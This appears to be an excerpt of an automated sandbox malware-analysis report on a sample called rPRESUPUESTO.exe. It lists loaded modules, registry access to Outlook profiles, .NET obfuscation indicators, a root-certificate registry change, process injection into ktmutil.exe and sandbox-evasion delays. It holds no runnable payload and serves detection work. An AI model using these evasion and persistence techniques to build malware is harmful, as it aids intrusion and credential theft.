            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll, ncobjapi.dll, wbemcomn.dll, kernel.appcore.dll, mpclient.dll, userenv.dll, version.dll, msasn1.dll, wmitomi.dll, mi.dll, miutils.dll, gpapi.dll
            Source: C:\Windows\SysWOW64\ktmutil.exe Section loaded: ktmw32.dll, wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe Section loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\ktmutil.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: rPRESUPUESTO.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: rPRESUPUESTO.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: rPRESUPUESTO.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MqDMLUHvZmSMqiwTfIsHo.exe, 00000008.00000000.2251157795.000000000098E000.00000002.00000001.01000000.0000000D.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000000.2398762392.000000000098E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: gESw.pdb source: rPRESUPUESTO.exe
            Source: Binary string: wntdll.pdbUGP source: rPRESUPUESTO.exe, 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000003.2330777913.0000000002976000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000003.2328626906.00000000027CA000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: gESw.pdbSHA256 source: rPRESUPUESTO.exe
            Source: Binary string: wntdll.pdb source: rPRESUPUESTO.exe, rPRESUPUESTO.exe, 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, ktmutil.exe, 00000009.00000003.2330777913.0000000002976000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000003.2328626906.00000000027CA000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ktmutil.pdbGCTL source: rPRESUPUESTO.exe, 00000005.00000002.2328360185.0000000001347000.00000004.00000020.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 00000008.00000002.4587226649.0000000001028000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ktmutil.pdb source: rPRESUPUESTO.exe, 00000005.00000002.2328360185.0000000001347000.00000004.00000020.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 00000008.00000002.4587226649.0000000001028000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: 0.2.rPRESUPUESTO.exe.8260000.5.raw.unpack, Awxd2xNHUlt8uvrdfk.cs .Net Code: M9vXm3sDMA System.Reflection.Assembly.Load(byte[])
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, Awxd2xNHUlt8uvrdfk.cs .Net Code: M9vXm3sDMA System.Reflection.Assembly.Load(byte[])
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, Awxd2xNHUlt8uvrdfk.cs .Net Code: M9vXm3sDMA System.Reflection.Assembly.Load(byte[])
            Source: rPRESUPUESTO.exe Static PE information: 0xEEB2EB9E [Sun Nov 25 17:32:14 2096 UTC]
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Code function: 0_2_0787AF9B push B807888Ch; iretd 0_2_0787AFA5
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Code function: 5_2_00414873 push ds; ret 5_2_00414882
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Code function: 5_2_00405163 push F29618B7h; iretd 5_2_00405168
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Code function: 5_2_00424103 push edi; retf 5_2_0042410C
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Code function: 5_2_0040512C push esi; iretd 5_2_0040512F
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Code function: 5_2_004169CC push ecx; retf 5_2_004169CD
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Code function: 5_2_004049E6 push ecx; retf 5_2_004049E7
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Code function: 5_2_004049E8 push eax; retf 5_2_004049EB
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Code function: 5_2_00411B84 push es; ret 5_2_00411B8F
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Code function: 5_2_00411B97 pushfd ; ret 5_2_00411BAB
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Code function: 5_2_00403490 push eax; ret 5_2_00403492
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Code function: 5_2_00404D07 push ds; ret 5_2_00404D10
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Code function: 5_2_017D09AD push ecx; mov dword ptr [esp], ecx 5_2_017D09B6
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe Code function: 8_2_04C6D089 push eax; ret 8_2_04C6D08B
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe Code function: 8_2_04C6265F push edi; retf 8_2_04C62673
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe Code function: 8_2_04C6AE6D push cs; retf 8_2_04C6AE6E
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe Code function: 8_2_04C6266A push edi; retf 8_2_04C62673
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe Code function: 8_2_04C6221D push esp; iretd 8_2_04C6223A
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe Code function: 8_2_04C6278D push ecx; iretd 8_2_04C6278E
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe Code function: 8_2_04C617BB push esp; iretd 8_2_04C617CA
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe Code function: 8_2_04C62743 push ecx; iretd 8_2_04C62744
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_02B509AD push ecx; mov dword ptr [esp], ecx 9_2_02B509B6
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_0018E6F1 push es; ret 9_2_0018E6FC
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_0018E704 pushfd ; ret 9_2_0018E718
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_001A0C70 push edi; retf 9_2_001A0C79
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_001913E0 push ds; ret 9_2_001913EF
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_00193539 push ecx; retf 9_2_0019353A
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_00181553 push ecx; retf 9_2_00181554
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_00181555 push eax; retf 9_2_00181558
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_00181874 push ds; ret 9_2_0018187D
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_00181C99 push esi; iretd 9_2_00181C9C
            Source: rPRESUPUESTO.exe Static PE information: section name: .text entropy: 7.915293858213766
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, jnNieI10C29r6YPK4W.csHigh entropy of concatenated method names: 'eHdTwuS5tA', 'boeTsV9I6h', 'Vmy40wruRa', 'ICi4Pe4v12', 'qrs4ZhUHZE', 'Mbk4n9y99p', 'lsj4Kwow1e', 'sbx4UbY56q', 'Qc94fwFVfi', 'Qih4Qv82R2'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, l1J7HFBZ1MgJlBwPK5.csHigh entropy of concatenated method names: 'do1xkYJ5ZO', 'YhaxGaoLyJ', 'RhXxXkFT5n', 'l7Kxu5gOvP', 'HGwxpekyZ9', 'lPVxTt5ep8', 'U5vxyTZ9cl', 'A4hlVHD1iO', 'hL9l7qNwUP', 'tPTlDHmnFm'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, rMS3WvcctN5gsoIYYg.csHigh entropy of concatenated method names: 'fD827ngggY', 'DD82B3cVQZ', 'Lp2lqNSVFd', 'THIlkGEP5h', 't2F2aIPypX', 'wgo2Rb6yG6', 'aRo2CnF7Zw', 'Bp82jLna0g', 'pGL29waH5P', 'fA72O7uumC'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, jcxJwOgYMsNuWo6rDt.csHigh entropy of concatenated method names: 'w874r60JFP', 'EhP4vNPr6I', 'Jfw4iu0Aha', 'sCK4gdGvN4', 'eYJ4orhu6n', 'EJL4td4MwM', 'zbB42iprRT', 'yS64lYXdSW', 'eXQ4xGl3EE', 'FEC4LiqFaE'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, kMIXWOixU8twbSWtxx.csHigh entropy of concatenated method names: 'FUEpj5hc98', 'Pdnp9h3jT5', 'HYQpON6Pb0', 'c3CpIwqvD9', 'qmYpAdPls6', 'GelpcZy3sK', 'Y0rpVgHqBY', 'Yqpp7qno6P', 'mnvpDnBbkp', 'gKHpBmkixK'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, Ays466Ye2OgS5tPSlk.csHigh entropy of concatenated method names: 'UmI8jD4es13CVk9kWCJ', 'g8JfXI4OovIFxvqN7DX', 'MqKyly7TfD', 'CPXyxPIsdo', 'AGpyLOup2E', 'PlVSsj4fyiHdeOSQnrT', 'y6kUTv4EZ0bm7gBVQwN'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, NZwxqDXBm7FlmwqLQl.csHigh entropy of concatenated method names: 'SWNkHMIXWO', 'rU8kNtwbSW', 'TYMkbsNuWo', 'urDkWtHnNi', 'GPKko4WFFj', 'btfktZgqUl', 'If4Uknt3EXGbCdPc05', 'LpM7y6pvYCRCX7TIDS', 'z71KoHr8C5kZiNNQmm', 'qRrkk768NW'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, sTe3F6fHuEKyNny7Lb.csHigh entropy of concatenated method names: 'L8EHJAGhxX', 'VjrH5PQ6B8', 'RQwHmyJ5SQ', 'a27HrQcZy5', 'l3OHwbyL49', 'aHkHva3jEA', 'Cu1HsUjETg', 'yEGHihThoL', 'A1GHg9NQqI', 'SFiH1EG3OT'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, Ljd7rDCBt3UIxc8BUY.csHigh entropy of concatenated method names: 'P5eEiKjnhp', 'F5pEgh7Qes', 'bARESosOXZ', 'kEbEYnsw5Y', 'jwPEPsSQ0t', 'mv4EZM9Km2', 'STiEKTRlL1', 'AkiEU4XKZG', 'pcoEQKtcOS', 'RCmEa4hv8y'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, CHhd18p30b5FjJ912H.csHigh entropy of concatenated method names: 'Dispose', 'j5GkDvOn2u', 'ImG8Y3ZePm', 'Bullllp2VL', 'acykBvj2dR', 'v9wkzc0YZE', 'ProcessDialogKey', 'Fcr8qSVmU4', 'VMZ8krBmlK', 'ldn88h1J7H'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, Vyvj2d7RF9wc0YZE1c.csHigh entropy of concatenated method names: 'zpZludnjXV', 'UdUlpS8247', 'W6Vl4HV2Wg', 'lJBlTexnAb', 'nSdlyqoh1J', 'yeVlH1sQsw', 'yjRlNEO0lj', 'Q6clh5w74c', 'wwMlbuAV6r', 'IAqlWlyyL2'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, Awxd2xNHUlt8uvrdfk.csHigh entropy of concatenated method names: 'bFqG3Bxpp6', 'yAGGuY70PU', 'nlNGpbAlrr', 'F3AG4IR8F1', 'RNTGTYo0nD', 'hxcGye63W4', 'wXIGHoZCg3', 'vReGNArNZa', 'FLYGh78DeE', 'EArGbxNRbA'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, Atp1CPja1oRVV7weY4.csHigh entropy of concatenated method names: 'WZwoQhBlxl', 'oL7oRW3WCI', 'dBlojLiYHI', 'Cwho9gk8Qq', 'z5HoYmWkVu', 'yiJo0VWJCO', 'XVSoPE2ZDk', 'zUToZCfc53', 'UsDonLwqt3', 'OKHoKH6cnW'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, Ek4TwYkqWlNK1TUGl6X.csHigh entropy of concatenated method names: 'esoxJTp71h', 'Gubx54Mx1e', 'G4XxmxmZyp', 'd3OxrK9mQu', 'SEaxwknDFj', 'k1Wxv6ICe5', 'c50xs7AND3', 'LuHxiLvJTY', 'pBDxgS0Zn4', 'Rrrx1XDUIG'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, YgVJrRKCxx1HS9qZcX.csHigh entropy of concatenated method names: 'D3GHu4qYg9', 'BZBH4Asg9u', 'glIHyechCm', 'miLyBNYn17', 'YVhyzfd1qT', 'iLNHqvHgoV', 'HnwHkGC7Na', 'sKIH87vdqT', 'JJDHGKTpkV', 'L1BHXpRKnF'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, JByv60Ip9yJbwQWgNM.csHigh entropy of concatenated method names: 'UCv2bh8dET', 'SMZ2WkXBHc', 'ToString', 'r3F2u1E950', 'xGB2pLwjce', 'e9T240BC4S', 'MOI2TrZXAE', 'Orm2ySqx1B', 'jBN2HH4x3M', 'tR62NNPoqu'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, vFj8tfSZgqUlYsQxMp.csHigh entropy of concatenated method names: 'y9Jy35RRa0', 'sy6ypiTSuA', 'ClhyTRlbPt', 'YvNyHymtc8', 'YYjyNe3OmX', 'BVYTABXb1X', 'L6bTcTtYhA', 'FIsTVBjUJb', 'jhrT7MD3SY', 'XUrTDEKKIR'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, ASVmU4DcMZrBmlKhdn.csHigh entropy of concatenated method names: 'qlHlSmAUJw', 'kQplY6rd28', 'Wp6l0fAp2x', 'vl0lPeWgKf', 'c9ZljWUKW5', 'N7NlZm7yiV', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, g9VT4R8NH23savAS8y.csHigh entropy of concatenated method names: 'CFOmpREXH', 'bG4rB6jxd', 'aHovDNemB', 'gj4svE4Tl', 's9QgTtGy4', 'oWw1gifUZ', 'ioxvO00wCF9lcA6DVg', 'ajlr4mBnZ769RSx0QF', 'D49jwEYpeYrfarkWnR', 'kNLlV1xQb'
            Source: 0.2.rPRESUPUESTO.exe.3db0428.2.raw.unpack, AjQT9mkG0ultOemfqx7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JJTLjH8whY', 'aCnL9xAyiN', 'u0xLOSw2b8', 'KmBLIh5pcY', 'ls5LApRAqR', 'fn8LchAfKy', 'd4eLVmvLa8'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, dYxsZezjD2vd6yPHgC.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UI3xEXPaLx', 'chPxoE7mpQ', 'n9XxtcsV6d', 'lctx2jJrAR', 'isbxl1oKcg', 'NwPxxJXMot', 'm6LxLK9j1p'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, jnNieI10C29r6YPK4W.csHigh entropy of concatenated method names: 'eHdTwuS5tA', 'boeTsV9I6h', 'Vmy40wruRa', 'ICi4Pe4v12', 'qrs4ZhUHZE', 'Mbk4n9y99p', 'lsj4Kwow1e', 'sbx4UbY56q', 'Qc94fwFVfi', 'Qih4Qv82R2'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, l1J7HFBZ1MgJlBwPK5.csHigh entropy of concatenated method names: 'do1xkYJ5ZO', 'YhaxGaoLyJ', 'RhXxXkFT5n', 'l7Kxu5gOvP', 'HGwxpekyZ9', 'lPVxTt5ep8', 'U5vxyTZ9cl', 'A4hlVHD1iO', 'hL9l7qNwUP', 'tPTlDHmnFm'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, rMS3WvcctN5gsoIYYg.csHigh entropy of concatenated method names: 'fD827ngggY', 'DD82B3cVQZ', 'Lp2lqNSVFd', 'THIlkGEP5h', 't2F2aIPypX', 'wgo2Rb6yG6', 'aRo2CnF7Zw', 'Bp82jLna0g', 'pGL29waH5P', 'fA72O7uumC'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, jcxJwOgYMsNuWo6rDt.csHigh entropy of concatenated method names: 'w874r60JFP', 'EhP4vNPr6I', 'Jfw4iu0Aha', 'sCK4gdGvN4', 'eYJ4orhu6n', 'EJL4td4MwM', 'zbB42iprRT', 'yS64lYXdSW', 'eXQ4xGl3EE', 'FEC4LiqFaE'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, kMIXWOixU8twbSWtxx.csHigh entropy of concatenated method names: 'FUEpj5hc98', 'Pdnp9h3jT5', 'HYQpON6Pb0', 'c3CpIwqvD9', 'qmYpAdPls6', 'GelpcZy3sK', 'Y0rpVgHqBY', 'Yqpp7qno6P', 'mnvpDnBbkp', 'gKHpBmkixK'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, Ays466Ye2OgS5tPSlk.csHigh entropy of concatenated method names: 'UmI8jD4es13CVk9kWCJ', 'g8JfXI4OovIFxvqN7DX', 'MqKyly7TfD', 'CPXyxPIsdo', 'AGpyLOup2E', 'PlVSsj4fyiHdeOSQnrT', 'y6kUTv4EZ0bm7gBVQwN'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, NZwxqDXBm7FlmwqLQl.csHigh entropy of concatenated method names: 'SWNkHMIXWO', 'rU8kNtwbSW', 'TYMkbsNuWo', 'urDkWtHnNi', 'GPKko4WFFj', 'btfktZgqUl', 'If4Uknt3EXGbCdPc05', 'LpM7y6pvYCRCX7TIDS', 'z71KoHr8C5kZiNNQmm', 'qRrkk768NW'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, sTe3F6fHuEKyNny7Lb.csHigh entropy of concatenated method names: 'L8EHJAGhxX', 'VjrH5PQ6B8', 'RQwHmyJ5SQ', 'a27HrQcZy5', 'l3OHwbyL49', 'aHkHva3jEA', 'Cu1HsUjETg', 'yEGHihThoL', 'A1GHg9NQqI', 'SFiH1EG3OT'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, Ljd7rDCBt3UIxc8BUY.csHigh entropy of concatenated method names: 'P5eEiKjnhp', 'F5pEgh7Qes', 'bARESosOXZ', 'kEbEYnsw5Y', 'jwPEPsSQ0t', 'mv4EZM9Km2', 'STiEKTRlL1', 'AkiEU4XKZG', 'pcoEQKtcOS', 'RCmEa4hv8y'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, CHhd18p30b5FjJ912H.csHigh entropy of concatenated method names: 'Dispose', 'j5GkDvOn2u', 'ImG8Y3ZePm', 'Bullllp2VL', 'acykBvj2dR', 'v9wkzc0YZE', 'ProcessDialogKey', 'Fcr8qSVmU4', 'VMZ8krBmlK', 'ldn88h1J7H'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, Vyvj2d7RF9wc0YZE1c.csHigh entropy of concatenated method names: 'zpZludnjXV', 'UdUlpS8247', 'W6Vl4HV2Wg', 'lJBlTexnAb', 'nSdlyqoh1J', 'yeVlH1sQsw', 'yjRlNEO0lj', 'Q6clh5w74c', 'wwMlbuAV6r', 'IAqlWlyyL2'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, Awxd2xNHUlt8uvrdfk.csHigh entropy of concatenated method names: 'bFqG3Bxpp6', 'yAGGuY70PU', 'nlNGpbAlrr', 'F3AG4IR8F1', 'RNTGTYo0nD', 'hxcGye63W4', 'wXIGHoZCg3', 'vReGNArNZa', 'FLYGh78DeE', 'EArGbxNRbA'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, Atp1CPja1oRVV7weY4.csHigh entropy of concatenated method names: 'WZwoQhBlxl', 'oL7oRW3WCI', 'dBlojLiYHI', 'Cwho9gk8Qq', 'z5HoYmWkVu', 'yiJo0VWJCO', 'XVSoPE2ZDk', 'zUToZCfc53', 'UsDonLwqt3', 'OKHoKH6cnW'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, Ek4TwYkqWlNK1TUGl6X.csHigh entropy of concatenated method names: 'esoxJTp71h', 'Gubx54Mx1e', 'G4XxmxmZyp', 'd3OxrK9mQu', 'SEaxwknDFj', 'k1Wxv6ICe5', 'c50xs7AND3', 'LuHxiLvJTY', 'pBDxgS0Zn4', 'Rrrx1XDUIG'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, YgVJrRKCxx1HS9qZcX.csHigh entropy of concatenated method names: 'D3GHu4qYg9', 'BZBH4Asg9u', 'glIHyechCm', 'miLyBNYn17', 'YVhyzfd1qT', 'iLNHqvHgoV', 'HnwHkGC7Na', 'sKIH87vdqT', 'JJDHGKTpkV', 'L1BHXpRKnF'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, JByv60Ip9yJbwQWgNM.csHigh entropy of concatenated method names: 'UCv2bh8dET', 'SMZ2WkXBHc', 'ToString', 'r3F2u1E950', 'xGB2pLwjce', 'e9T240BC4S', 'MOI2TrZXAE', 'Orm2ySqx1B', 'jBN2HH4x3M', 'tR62NNPoqu'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, vFj8tfSZgqUlYsQxMp.csHigh entropy of concatenated method names: 'y9Jy35RRa0', 'sy6ypiTSuA', 'ClhyTRlbPt', 'YvNyHymtc8', 'YYjyNe3OmX', 'BVYTABXb1X', 'L6bTcTtYhA', 'FIsTVBjUJb', 'jhrT7MD3SY', 'XUrTDEKKIR'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, ASVmU4DcMZrBmlKhdn.csHigh entropy of concatenated method names: 'qlHlSmAUJw', 'kQplY6rd28', 'Wp6l0fAp2x', 'vl0lPeWgKf', 'c9ZljWUKW5', 'N7NlZm7yiV', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, g9VT4R8NH23savAS8y.csHigh entropy of concatenated method names: 'CFOmpREXH', 'bG4rB6jxd', 'aHovDNemB', 'gj4svE4Tl', 's9QgTtGy4', 'oWw1gifUZ', 'ioxvO00wCF9lcA6DVg', 'ajlr4mBnZ769RSx0QF', 'D49jwEYpeYrfarkWnR', 'kNLlV1xQb'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, AjQT9mkG0ultOemfqx7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JJTLjH8whY', 'aCnL9xAyiN', 'u0xLOSw2b8', 'KmBLIh5pcY', 'ls5LApRAqR', 'fn8LchAfKy', 'd4eLVmvLa8'

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AFE5D244A8D1194230FF479FE2F897BBCD7A8CB4 Blob
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\ktmutil.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match File source: Process Memory Space: rPRESUPUESTO.exe PID: 3180, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\ktmutil.exe API/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\ktmutil.exe API/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\ktmutil.exe API/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\ktmutil.exe API/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\ktmutil.exe API/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\ktmutil.exe API/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\ktmutil.exe API/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\ktmutil.exe API/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Memory allocated: D20000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Memory allocated: 2950000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Memory allocated: 2760000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Memory allocated: 83F0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Memory allocated: 93F0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Memory allocated: 95D0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Memory allocated: A5D0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Code function: 5_2_0181096E rdtsc 5_2_0181096E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Thread delayed: delay time: 240000
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Thread delayed: delay time: 239873
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Thread delayed: delay time: 239749
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe Thread delayed: delay time: 922337203685477
